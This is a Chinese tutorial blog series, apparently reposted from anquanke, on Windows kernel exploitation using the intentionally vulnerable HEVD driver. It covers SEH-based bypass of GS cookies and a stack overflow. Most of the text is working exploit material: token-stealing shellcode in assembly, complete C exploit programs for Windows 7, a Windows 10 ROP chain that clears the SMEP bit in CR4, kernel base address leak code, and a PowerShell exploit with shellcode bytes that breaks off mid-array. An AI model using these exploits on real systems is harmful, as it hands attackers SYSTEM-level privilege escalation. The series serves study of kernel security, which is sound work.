2020-10-16T08:50:34.000Z

利用HEVD学习windows kernel exploit 正式篇1.5 StackOverflowGS

Window Kernel Exploit 01.5 - StackOverflowGS

这一篇和上一篇的技巧几乎一致，所以就咕咕咕不写EXP了（主要还是因为懒），不过可以介绍一下和内核相关的SEH利用技巧:

SEH with user mode

记得之前曾经写过一篇和SEH相关的文章:WindowsSEH
当时虽然写了一大串的利用方法，但是没写到关键上。形如如下的代码:

__try {

char buffer[100];
for (int i = 0; i < 214; i++)
buffer[i] = 'C';
}
__except (EXCEPTION_EXECUTE_HANDLER) {
puts("Now we get exception....");
}

}

实际上是不会打印Now we get exception....这句话的。因为当Cookie被修改的时候，代码会陷入上文提到的int 29中断，这个中断会让程序直接终止，而不是去调用异常处理链。（可以这么理解：检查cookie这个过程实际上是发生在函数调用结束的时候，此时代码并没有被try...except包含，也就不会触发异常链。）如果想要实现劫持SEH链的目的，那么需要做到的其实是

在try…except包含的代码块中间直接抛出错误

在这类代码中可以通过写入大量数据做到:

   __try{
       gets(buffer);
   }
__except (EXCEPTION_EXECUTE_HANDLER) {
puts("Now we get exception....");
}

刚刚不是说了不能通过修改cookie触发SEH吗？

对的，这里并不是修改cookie，而实直接写爆栈:

user-mode 下，正确的触发SEH的姿势就是在gets的过程中，访问了不可访问的地址，从而抛出access deny的错误
此时，就能够通过修改SEH handler的方法来劫持程序流

SEH with kernel mode

然而在内核模式下，如果存在一个栈溢出的漏洞，却不能像用户空间那样玩。因为在内核中，如果访问了内核空间中不可访问的地址，那么会直接触发BSoD，并不会进入异常处理的逻辑中。那么这个时候要如何触发SEH呢？
对于这类特定的状况下，有一种处理方法:

NTSTATUS StackOverflowGSIoctlHandler(IN PIRP Irp, IN PIO_STACK_LOCATION IrpSp) {
    SIZE_T Size = 0;
    PVOID UserBuffer = NULL;
    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    UNREFERENCED_PARAMETER(Irp);
    PAGED_CODE();

    UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
    Size = IrpSp->Parameters.DeviceIoControl.InputBufferLength;

    if (UserBuffer) {
        Status = TriggerStackOverflowGS(UserBuffer, Size);
    }

    return Status;
}

NTSTATUS TriggerStackOverflowGS(IN PVOID UserBuffer, IN SIZE_T Size) {
    NTSTATUS Status = STATUS_SUCCESS;
    UCHAR KernelBuffer[BUFFER_SIZE] = {0};

    PAGED_CODE();

    __try {
        // Verify if the buffer resides in user mode
        ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(KernelBuffer));

        DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
        DbgPrint("[+] UserBuffer Size: 0x%X\n", Size);
        DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
        DbgPrint("[+] KernelBuffer Size: 0x%X\n", sizeof(KernelBuffer));

#ifdef SECURE
        // Secure Note: This is secure because the developer is passing a size
        // equal to size of KernelBuffer to RtlCopyMemory()/memcpy(). Hence,
        // there will be no overflow
        RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));
#else
        DbgPrint("[+] Triggering Stack Overflow (GS)\n");

        // Vulnerability Note: This is a vanilla Stack based Overflow vulnerability
        // because the developer is passing the user supplied size directly to
        // RtlCopyMemory()/memcpy() without validating if the size is greater or
        // equal to the size of KernelBuffer
        RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

如上，我们会发现，有漏洞的函数TriggerStackOverflowGS 所拷贝的UserBuffer实际上是来自于IrpSp->Parameters.DeviceIoControl.Type3InputBuffer。这个Type3InputBuffer实际上 是一个从用户态传来的指针。这个是由IRP控制的缓冲区，所以说不会触发SAMP。那么此时相当于说指针本身也是由我们控制的。

可以人为的创造出用户空间的访问异常，从而抛出异常。

此时可以利用CreateFileMapping和MapViewOfFile。这两个API会向进程申请一段地址空间（保留一个地址空间的区域用来存放内存映射文件），并且将这段文件映射到地址空间上。这个过程其实和系统调用VirualAlloc类似，唯一不同的就是这个分配的过程我们是全程可控。那么在获取了映射的地址之后，我们可以修改本来指向分配在用户地址空间开头的指针，让其指向映射地址的结尾。这样在内核在调用RtlCopyMemory的时候，就能控制其访问到不可访问的地址，触发SEH

// Create the shared memory
Sharedmemory = CreateFileMapping(INVALID_HANDLE_VALUE,
                                    NULL,
                                    PAGE_EXECUTE_READWRITE,
                                    0,
                                    PageSize,
                                    SharedMemoryName);

if (!Sharedmemory) {
    DEBUG_ERROR("\t\t\t[-] Failed To Create Shared Memory: 0x%X\n", GetLastError());
    exit(EXIT_FAILURE);
}
else {
    DEBUG_INFO("\t\t\t[+] Shared Memory Handle: 0x%p\n", Sharedmemory);
}

DEBUG_INFO("\t\t[+] Mapping Shared Memory To Current Process Space\n");

// Map the shared memory in the process space of this process
SharedMappedMemoryAddress = MapViewOfFile(Sharedmemory,
                                            FILE_MAP_ALL_ACCESS,
                                            0,
                                            0,
                                            PageSize);

if (!SharedMappedMemoryAddress) {
    DEBUG_ERROR("\t\t\t[-] Failed To Map Shared Memory: 0x%X\n", GetLastError());
    exit(EXIT_FAILURE);
}
else {
    DEBUG_INFO("\t\t\t[+] Mapped Shared Memory: 0x%p\n", SharedMappedMemoryAddress);
}

SuitableMemoryForBuffer = (PVOID)((ULONG)SharedMappedMemoryAddress + (ULONG)(PageSize - SeHandlerOverwriteOffset));

触发SEH之后，就和普通的Buffer Overflow一样操作即可。

WindowKernelExploit01

2020-10-16T08:34:34.000Z

利用HEVD学习windows kernel exploit 正式篇1 StackOverflow

本篇转自安全客 https://www.anquanke.com/post/id/218682

Window Kernel Exploit 01 - StackOverflow

栈溢出是一个最基本的漏洞利用方式，这里我们利用这个作为入门学习，了解一下在 Windows Kernel 下执行栈溢出的不同之处。

漏洞程序

找到之前准备好的HackSysExtremeVulnerableDriver.sys，里面有一个准备好的带有栈溢出的函数，叫做StackOverflowIoctlHandler。我们通过逆向，找到对应触发函数的IOCTL:

记录下此时的 IOCTL Code 为 222003h。之后我们来看这个程序的内部逻辑:

int __stdcall StackOverflowIoctlHandler(PIRP a1, PIO_STACK_LOCATION a2)
{
  int v2; // ecx
  HANDLE v3; // edx

  v2 = 0xC0000001;
  v3 = a2->Parameters.SetFile.DeleteHandle;
  if ( v3 )
    v2 = TriggerStackOverflow(v3, a2->Parameters.Create.Options);
  return v2;
}

这里注意一下，这类IOCTL Handle Routine的传入参数类型是固定的，一定是第一个为PRIR，第二个为PIO_STACK_LOCATION，如果没有识别出参数的话，可以直接指定参数类型
此时发现，这个a2好像识别的有一点问题，从函数名也能猜到，程序逻辑本身应该是一个读取Buffer的逻辑，不应该和SetFile这类文件操作相关，所以这里推测，应该是PIO_STACK_LOCATION结构体中存在union结构，所以此时识别的结构体出现了错误。这个时候回退到Disassembly的界面，然后在参数的位置处右键，选择Structure Offset，就能够修改当前结构体识别的类型。

这里我们修改成和DeviceIoControl相关的DeviceIoControl.Type3InputBuffer，下面的参数也修改成DeviceIoControl.InputBufferLength，整个逻辑就变成了

int __stdcall StackOverflowIoctlHandler(PIRP a1, _IO_STACK_LOCATION *a2)
{
  int v2; // ecx
  PVOID Buffer; // edx

  v2 = 0xC0000001;
  Buffer = a2->Parameters.DeviceIoControl.Type3InputBuffer;
  if ( Buffer )
    v2 = TriggerStackOverflow(Buffer, a2->Parameters.DeviceIoControl.InputBufferLength);
  return v2;
}

此时逻辑就清晰了很多：读取IO_STACK_LOCATION指针指向的Buffer内容，并且将Buffer的和Buffer的长度传入到触发函数中。并且触发函数中的内容如下:

int __stdcall TriggerStackOverflow(void *Address, size_t MaxCount)
{
  char Dst; // [esp+14h] [ebp-81Ch]
  CPPEH_RECORD ms_exc; // [esp+818h] [ebp-18h]

  memset(&Dst, 0, 0x800u);
  ms_exc.registration.TryLevel = 0;
  ProbeForRead(Address, 0x800u, 4u);
  DbgPrint("[+] UserBuffer: 0x%p\n", Address);
  DbgPrint("[+] UserBuffer Size: 0x%X\n", MaxCount);
  DbgPrint("[+] KernelBuffer: 0x%p\n", &Dst);
  DbgPrint("[+] KernelBuffer Size: 0x%X\n", 2048);
  DbgPrint("[+] Triggering Stack Overflow\n");
  memcpy(&Dst, Address, MaxCount);
  return 0;
}

简单介绍一下内核函数ProbeForRead：

void ProbeForRead(
  const volatile VOID *Address,
  SIZE_T              Length,
  ULONG               Alignment
);

函数能够检查当前的地址是否属于用户态（访问地址是否越界），并且检查当前的地址是否是按照第三个参数要求的 Alignment 进行对齐。然后就会将当前传入的Buffer按照Buffer本身的MaxCount拷贝到栈上，从而造成栈溢出。

利用分析

整个逻辑是分析清楚了：只要使用DeviceIoControl从用户端这边发送请求，并且使用的是Buffer,而且大小超过了0x81c，就会发生栈溢出，造成返回值被劫持。

提权相关

单纯劫持返回值还不够，因为内核态并没有类似于system这类方便的劫持函数。在内核态实现劫持，根据平台的不同，会使用的不同的劫持方式

WIN7

在Win7阶段，内核态并没有做过多的限制，所以可以在内核态执行用户态的程序。那么如果劫持了返回值，那么便是可以运行由我们自己申请的地址空间上的shellcode。一般的逻辑如下：
首先在Windows操作系统中，所有的东西都被视为对象，每一个对象都有一个安全描述符（security descriptors）（长得有点像(A;;RPWPCCDCLCRCWOWDSDSW;;;DA)这样的）其在内存中存储的形式通常为一个token。它会描述当前进程的所有者，以及其的相关权限，包括对文件的操作等等。这里最高的权限就是NT AUTHORITY\SYSTEM，系统权限拥有对所有文件的任意权力（相当于是su）。所以一般的提权思路就是：

遍历当前所有进程
找到当前进程中的系统进程（通常来说进程号4的进程就是系统进程啦）
将其的安全描述符token复制到当前进程的安全描述符中，即可完成提权

能够找到的payload如下

pushad                               ; Save registers state

; Start of Token Stealing Stub
xor eax, eax                         ; Set ZERO
mov eax, fs:[eax + KTHREAD_OFFSET]   ; Get nt!_KPCR.PcrbData.CurrentThread
                                      ; _KTHREAD is located at FS:[0x124]

mov eax, [eax + EPROCESS_OFFSET]     ; Get nt!_KTHREAD.ApcState.Process

mov ecx, eax                         ; Copy current process _EPROCESS structure

mov edx, SYSTEM_PID                  ; WIN 7 SP1 SYSTEM process PID = 0x4

SearchSystemPID:
    mov eax, [eax + FLINK_OFFSET]    ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
    sub eax, FLINK_OFFSET
    cmp [eax + PID_OFFSET], edx      ; Get nt!_EPROCESS.UniqueProcessId
    jne SearchSystemPID

mov edx, [eax + TOKEN_OFFSET]        ; Get SYSTEM process nt!_EPROCESS.Token
mov [ecx + TOKEN_OFFSET], edx        ; Replace target process nt!_EPROCESS.Token
                                      ; with SYSTEM process nt!_EPROCESS.Token
; End of Token Stealing Stub

popad                                ; Restore registers state

; Kernel Recovery Stub
xor eax, eax                         ; Set NTSTATUS SUCCEESS
add esp, 12                          ; Fix the stack
pop ebp                              ; Restore saved EBP
ret 8                                ; Return cleanly

EXP实现

内核态的通信和用户态不太一样。看过的教材中有使用C语言直接编译exe的，也有使用python/powershell调用库进行攻击的。于是这里打算介绍一下最普通的使用C语言的攻击，以及最近比较流行的使用powershell进行的攻击（这一类似乎被称之为fileless attack)

C语言

通讯准备

首先要能够实现最基本的通信，使用C（Cpp）的话，需要直接调用Windows系列的API对文件进行操作，如下:

#include "pch.h"
#include 
#include 

#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

HANDLE GetDeviceHandle() {
HANDLE hRet = NULL;
hRet = CreateFile(
DEVICE_NAME,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
NULL
);
if (hRet == INVALID_HANDLE_VALUE) {
std::cout << "Error open Device with error code " << GetLastError() << std::endl;
}
return hRet;
}
// Just Communicate with Driver
VOID TriggerStackOverFlow(DWORD dwCTLCode) {
HANDLE hDev = GetDeviceHandle();
if (!hDev)
return;
std::cout << "We Get handle is :" << std::hex << hDev << std::endl;

DWORD dwSize = 0x818;
DWORD dwRetSize = 0;
CHAR *Buffer = (CHAR*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSize);
RtlFillMemory(Buffer, dwSize, 'A');

OutputDebugString(L"[+]  =========== Kernel Mode  =============== [+]");
DeviceIoControl(hDev, dwCTLCode, Buffer, dwSize, NULL, 0, &dwRetSize, NULL);
OutputDebugString(L"[+]  =========== IOCTL Finish =============== [+]");

std::cout << "Finish Send IOCTL" << std::endl;
HeapFree(GetProcessHeap(), 0, Buffer);
Buffer = NULL;
}
int main()
{
    std::cout << "[+] Exerciese: Stack Overflow\n"; 
TriggerStackOverFlow(0x222003);
}

提权攻击(Win7)

由于Win7上暂时没有太多的防护，所以可以直接使用拷贝token的方式进行提权。这里直接通过计算好返回值所需要的padding，然后让返回的地址跳转到我们自己申请的内存空间上来实现攻击。不过这里要考虑一件事情：以前我们都是直接弹出一个cmd结束攻击，然而提权攻击却不能只弹出一个cmd就完成攻击，这意味着类似BufferOverflow这类攻击如果将栈的内容进行了修改之后，我们需要有一个防止系统发现栈被破坏的操作。为了实现这一点，我们需要先观察一下栈中的内容:

eax=00000000 ebx=9bf375f0 ecx=00000000 edx=00000000 esi=c00000bb edi=9bf37580
eip=9ddf4dde esp=a36bda14 ebp=a36bda14 iopl=0         nv up ei ng nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000286
HackSysExtremeVulnerableDriver!StackOverflowIoctlHandler+0x20:
9ddf4dde 5d              pop     ebp; ret     8
1: kd> ddp esp
a36bda14  a36bda30 ;上一个栈的ebp
a36bda18  9ddf42d3 ;函数返回值，即将被我们劫持
a36bda1c  9bf37580 ;
a36bda20  9bf375f0 
a36bda24  00060000 ;ret之后，esp实际指向的位置
a36bda28  a79efa88 
a36bda2c  b01a6b0e 
a36bda30  a36bda4c ;函数 StackOverflowIoctlHandler 保存的的ebp
a36bda34  81a3f958 ;函数 StackOverflowIoctlHandler 保存的返回值
a36bda38  a79efa88 00b80003
a36bda3c  9bf37580 00940006

在距离返回值地址的0x18的位置上，正好有上一个函数的返回地址，所以当我们劫持了这个函数返回值的时候，在shellcode的末尾，我们可以加上一些额外的指令来实现恢复栈

xor eax, eax  ;伪装返回值
add esp, 12   ;将栈调整到 StackOverflowIoctlHandler 的位置上
pop ebp 
ret 8         ;这个地方照着 TriggerStackOverFlow 的结尾汇编写

这里我们参考HEVD给出的参考答案:

#include "pch.h"
#include "payload.h"
#include 
#include 

#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

VOID TokenStealingPayloadWin7() {
// Importance of Kernel Recovery
__asm {
pushad; Save registers state

; Start of Token Stealing Stub
xor eax, eax; Set ZERO
mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
; _KTHREAD is located at FS : [0x124]

mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process

mov ecx, eax; Copy current process _EPROCESS structure

mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM process PID = 0x4

SearchSystemPID:
mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, FLINK_OFFSET
cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID

mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
mov[ecx + TOKEN_OFFSET], edx; Replace target process nt!_EPROCESS.Token
; with SYSTEM process nt!_EPROCESS.Token
; End of Token Stealing Stub

popad; Restore registers state

; Kernel Recovery Stub
xor eax, eax; Set NTSTATUS SUCCEESS
add esp, 12; Fix the stack
pop ebp; Restore saved EBP
ret 8; Return cleanly
}
}

HANDLE GetDeviceHandle() {
HANDLE hRet = NULL;
hRet = CreateFile(
DEVICE_NAME,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
NULL
);
if (hRet == INVALID_HANDLE_VALUE) {
std::cout << "Error open Device with error code " << GetLastError() << std::endl;
}
return hRet;
}
// Just Communicate with Driver
VOID TriggerStackOverFlow(DWORD dwCTLCode) {
HANDLE hDev = GetDeviceHandle();
if (!hDev)
return;
std::cout << "We Get handle is :" << std::hex << hDev << std::endl;

DWORD dwSize = 0x824;
DWORD dwRetSize = 0;
PVOID ExpAddress = &TokenStealingPayloadWin7;
PVOID RetAddress = NULL;
CHAR *Buffer = (CHAR*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSize);
RtlFillMemory(Buffer, dwSize, 'A');

// calculate ret address
RetAddress = &Buffer[0x820];
*(PULONG)RetAddress = (ULONG)ExpAddress;

OutputDebugString(L"[+]  =========== Kernel Mode  =============== [+]");
DeviceIoControl(hDev, dwCTLCode, Buffer, dwSize, NULL, 0, &dwRetSize, NULL);
OutputDebugString(L"[+]  =========== IOCTL Finish =============== [+]");

std::cout << "Finish Send IOCTL" << std::endl;
HeapFree(GetProcessHeap(), 0, Buffer);
Buffer = NULL;
}
int main()
{
    std::cout << "[+] Exerciese: Stack Overflow\n"; 
TriggerStackOverFlow(0x222003);
}

提权攻击(Win10)

然而，如果用上述exp的话，似乎并没有那么顺利。我们调试可以看到如下结果:

HackSysExtremeVulnerableDriver!TriggerStackOverflow+0xc8:
9ddf4eaa c9              leave
9ddf4eab c20800          ret     8
;如果从这里执行下去的话，会看到如下的指令
1: kd> t
00f214b0 53              push    ebx
1: kd> u 00f214b0
00f214b0 53              push    ebx
00f214b1 56              push    esi
00f214b2 57              push    edi
00f214b3 60              pushad
00f214b4 33c0            xor     eax,eax
00f214b6 648b8024010000  mov     eax,dword ptr fs:[eax+124h]
00f214bd 8b4050          mov     eax,dword ptr [eax+50h]
00f214c0 8bc8            mov     ecx,eax

乍一看好像是成功的，但是如果让程序继续执行的话就会爆出如下的错误:

1: kd> t
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc
                       (0x00F214B0,0x25EEE125,0xA37449A0,0x80000005)


A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

这个错误码的意思是ATTEMPTED EXECUTE ON NOEXECUTE MEMORY，因为从Win 8.1 开始，Windows 就有了一种新的保护措施，叫做Supervisor Mode Execution Prevention(SMEP)。在这个保护下，不能在ring 0 的环境中执行 ring 3的代码。到了这个时候，就需要使用一些特殊的手段关闭这个特性。最常见的手段就是利用ROP攻击，修改cr4寄存器内容。一个常见的函数就是:

.text:00401000
...

.text:0048BF1D                 pop     eax
.text:0048BF1E                 retn

KeFlushCurrentTb

.text:0057DF86                 mov     cr4, eax
.text:0057DF89                 retn
; 这里用IDA观察有一个bug(?)，内存中的一些值没有按照真正的值进行映射（也可能是相对偏移的锅？）然后导致一些数据的位置不对。。。最后的偏移量需要动态调试得到

利用这个ROP，让RCX赋值为CR4。不过这里注意一点，由于这里使用的，此时如果使用IDA观察的话，需要知道当前段映射的真正偏移量。这个可以通过观察如下的特征知道:

1
2
3

.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size                  : 00295B24 (2710308.)
.text:00401000 ; Section size in file          : 00295C00 (2710528.)

每个段开头都会有一个virtual address，这个值表示的是当前段会映射的地址，具体计算方式为real_address = image_base_address + virtual_address。也就是说此时的.text段在内存中的真正的地址为:
real_text = image_base_address + 0x1000

然后我们需要观察cr4此时的正确的值。首先我们找到储了问题时的cr4:

For analysis of this file, run !analyze -v
nt!RtlpBreakWithStatusInstruction:
81b66484 cc              int     3
1: kd> r cr4
cr4=001406e9

上网查找可知，第20bit为1表示的是SMEP打开（记得从低位往高位数，并且第一位数字是第0bit，第二位数字是第1bit），那么我们只需要将这一bit置0，即可以将这种防护关闭，此时也就是将值改成0x0406e9。
有了ROP，那么我们就需要一个泄露内核地址的途径。这里有两种不同的方式，一个叫做:EnumDrivers的API，另一种是利用NtQueryInformationSystem的方式获取。前者是官方给出的API，通过调用直接获取地址，而后者是则是通过逆向分析+动态调试，验证可知当前的地址空间上存放的是ntoskrl.exe的基地址。
前者直接就是一个API:

BOOL EnumDeviceDrivers(
  LPVOID  *lpImageBase,
  DWORD   cb,
  LPDWORD lpcbNeeded
);

并且据观察，返回的地址数组中lpImageBase，第一个就是ntoskrl.exe的基地址。不过使用这个方法的时候，需要用到管理员权限。
这里打算用第一种方法实现地址泄露，第二种攻击方法参考(https://www.anquanke.com/post/id/173144)[https://www.anquanke.com/post/id/173144]，贴出用NtQueryInformationSystem的exp:

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation = 0,
    SystemPerformanceInformation = 2,
    SystemTimeOfDayInformation = 3,
    SystemProcessInformation = 5,
    SystemProcessorPerformanceInformation = 8,
    SystemModuleInformation = 11,
    SystemInterruptInformation = 23,
    SystemExceptionInformation = 33,
    SystemRegistryQuotaInformation = 37,
    SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG NumberOfModules;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef struct _ROP {
    PUCHAR PopRcxRet;
    PUCHAR Cr4RegValue;
    PUCHAR MovCr4EcxRet;
} ROP, *PROP;

typedef NTSTATUS(NTAPI *_NtQuerySystemInformation)(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );

__int64* GetKernelBase()
{
    DWORD len;
    PSYSTEM_MODULE_INFORMATION ModuleInfo;
    __int64 *kernelBase = NULL;
    _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
        GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    if (NtQuerySystemInformation == NULL) {
        return NULL;
    }
    NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
    ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!ModuleInfo)
    {
        return NULL;
    }
    NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
    kernelBase = (__int64*)ModuleInfo->Module[0].ImageBase;
    VirtualFree(ModuleInfo, 0, MEM_RELEASE);
    return kernelBase;
}

回到正文，此时代码修改如下:

VOID TokenStealingPayloadWin7() {
// Importance of Kernel Recovery
__asm {
pushad; Save registers state

; Start of Token Stealing Stub
xor eax, eax; Set ZERO
mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
; _KTHREAD is located at FS : [0x124]

mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process

mov ecx, eax; Copy current process _EPROCESS structure

mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM process PID = 0x4

SearchSystemPID:
mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, FLINK_OFFSET
cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID

mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
mov[ecx + TOKEN_OFFSET], edx; Replace target process nt!_EPROCESS.Token
; with SYSTEM process nt!_EPROCESS.Token
; End of Token Stealing Stub

popad; Restore registers state

; Kernel Recovery Stub
xor eax, eax; Set NTSTATUS SUCCEESS
add esp, 0x1c; Fix the stack
pop ebp; Restore saved EBP
ret 8; Return cleanly
}
}
// Just Communicate with Driver
VOID TriggerStackOverFlow(DWORD dwCTLCode) {
HANDLE hDev = GetDeviceHandle();
if (!hDev)
return;
std::cout << "We Get handle is :" << std::hex << hDev << std::endl;

DWORD dwSize = 0x824 + 0x4/*pop ecx*/+ 0x4 * 2/*padding for esp*/+ 0x4/*ecx real value*/ + 0x4/*mov cr4 */;
DWORD dwRetSize = 0;
PVOID ExpAddress = &TokenStealingPayloadWin7;
PVOID RetAddress = NULL;
CHAR *Buffer = (CHAR*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSize);

// prepare ROP
DWORD dwBaseAddress = LeakNtoskrlBaseAddr();
std::cout << "Leak Device Address " << std::hex << dwBaseAddress << std::endl;

// get ROP address
DWORD dwSegBaseAddr = 0x00401000;
DWORD dwSegOffset = 0x1000;
DWORD dwRealPOPECX, dwBasePOPEAX = 0x0048BF1D;
DWORD dwRealMOVCR4, dwBaseMOVCR4 = 0x0057DF86;
dwRealMOVCR4 = dwBaseMOVCR4 - dwSegBaseAddr + dwBaseAddress + dwSegOffset;
dwRealPOPECX = dwBasePOPEAX - dwSegBaseAddr + dwBaseAddress + dwSegOffset;

std::cout << "[+] pop ecx is " << std::hex << dwRealPOPECX << std::endl;
std::cout << "[+} mov cr4 is " << std::hex << dwRealMOVCR4 << std::endl;

puts("[+] Begin to attack");
getchar();
// write it to attack buffer
RtlFillMemory(Buffer, dwSize, 'A');
RetAddress = &Buffer[0x820];
*(PULONG)RetAddress = (ULONG)dwRealPOPECX;
RetAddress = &Buffer[0x82c];
*(PULONG)RetAddress = (ULONG)0x406e9;
RetAddress = &Buffer[0x830];
*(PULONG)RetAddress = (ULONG)dwRealMOVCR4;
RetAddress = &Buffer[0x834];
*(PULONG)RetAddress = (ULONG)ExpAddress;

OutputDebugString(L"[+]  =========== Kernel Mode  =============== [+]");
DeviceIoControl(hDev, dwCTLCode, Buffer, dwSize, NULL, 0, &dwRetSize, NULL);
OutputDebugString(L"[+]  =========== IOCTL Finish =============== [+]");

std::cout << "Finish Send IOCTL" << std::endl;
HeapFree(GetProcessHeap(), 0, Buffer);
Buffer = NULL;
}

不过这里由于引入了ROP，这里需要重新讨论一下栈的地址。
此时->指向的是之后会修改成的内容。由于加入了ROP，导致原先利用的返回值会被覆盖掉，所以这里需要重新调整返回值，让esp在调用exp的地址后，加上0x1c，让其跳转到nt!IofCallDriver的返回值，从而恢复调用栈。

Powershell版本

本质上差不多，不过这边使用的是Powershell下的编程:

Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;

public static class EVD2
{
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr VirtualAlloc(
        IntPtr ptrAddress,
        uint dwSize,
        UInt32 AllocationType,
        UInt32 Protext
    );

    [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
    public static extern IntPtr CreateFile(
        String lpFileName,
        UInt32 dwDesireAccess,
        UInt32 dwSharingMode,
        IntPtr lpSecurityAttributes,
        UInt32 dwCreationDisposition,
        UInt32 dwFlagsAndAttributes,
        IntPtr hTemplateFile
    );

    [DllImport("Kernel32.dll", SetLastError = true)]
    public static extern bool DeviceIoControl(
        IntPtr hDevice,
        int IoControlCode,
        byte[] InBuffer,
        int nInBufferSize,
        byte[] OutBuffer,
        int nOutBufferSize,
        ref int pBytesReturned,
        IntPtr Overlapped); 

    [DllImport("kernel32.dll")]
    public static extern uint GetLastError();

    [DllImport("psapi")]
    public static extern bool EnumDeviceDrivers(
        [MarshalAs(UnmanagedType.LPArray, ArraySubType = UnmanagedType.U4)] [In][Out] UInt32[] ddAddresses,
        UInt32 arraySizeBytes,
        [MarshalAs(UnmanagedType.U4)] out UInt32 bytesNeeded
    );
}
"@

Function LeakBaseAddress(){
    $dwByte = 0
    $status=[bool] [EVD2]::EnumDeviceDrivers(0, 0, [ref]$dwByte)
    if(!$status){
        echo $("[*] Unable to enum device.... with error 0x{0:x}`n" -f [EVD2]::GetLastError())
    }
    $ptrAddress = [Uint32[]](9)*0x1000
    $status=[bool] [EVD2]::EnumDeviceDrivers([UInt32[]]$ptrAddress, $dwByte+10, [ref]$dwByte)
    # echo $("Address is {0:x}" -f $ptrAddress[0])
    return $ptrAddress[0]
}

$hDevice = [EVD2]::CreateFile("\\.\HackSysExtremeVulnerableDriver", [System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::ReadWrite, [System.IntPtr]::Zero, 0x3, 0x40000080, [System.IntPtr]::Zero)

if($hDevice -eq -1){
    echo "`n[*] Unbale to open this driver...`n"
    Return
}

echo "`[+] The Device object is $($hDevice) "
# then we need create an array with buffer
[Int32]$dwSize = 0x820
# +0x4+0x8+0x4+0x4
# alloc buffer for shellcode
$Shellcode = [Byte[]] @(
    #---[Setup]
    0x53,                                       # push    ebx
    0x56,                                       # push    esi
    0x57,                                       # push    edi
    0x60,                                       # pushad
    0x33, 0xC0,                                 # xor eax, eax
    0x64, 0x8B, 0x80, 0x24, 0x01, 0x00, 0x00,   # mov eax, fs:[KTHREAD_OFFSET]
    0x8B, 0x80, 0x80, 0x00, 0x00, 0x00,         # mov eax, [eax + EPROCESS_OFFSET]
    0x8B, 0xC8,                                 # mov ecx, eax (Current _EPROCESS structure)
    # 0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, # mov ebx, [eax + TOKEN_OFFSET]
    #---[Copy System PID token]
